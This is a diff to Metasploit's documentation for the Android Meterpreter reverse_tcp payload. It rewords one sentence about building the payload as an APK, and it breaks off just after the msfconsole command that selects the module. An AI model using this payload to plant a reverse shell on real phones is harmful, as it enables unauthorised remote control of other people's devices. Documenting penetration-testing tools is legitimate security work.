rapid7/metasploit-framework/documentation/modules/payload/android/meterpreter/reverse_tcp.md

 Currently, the most common way to use Android Meterpreter is to create it as an APK, and then execute it.

-To create the APK, here is how with msfconsole:
+To create the APK with msfconsole:

 ```
 msf > use payload/android/meterpreter/reverse_tcp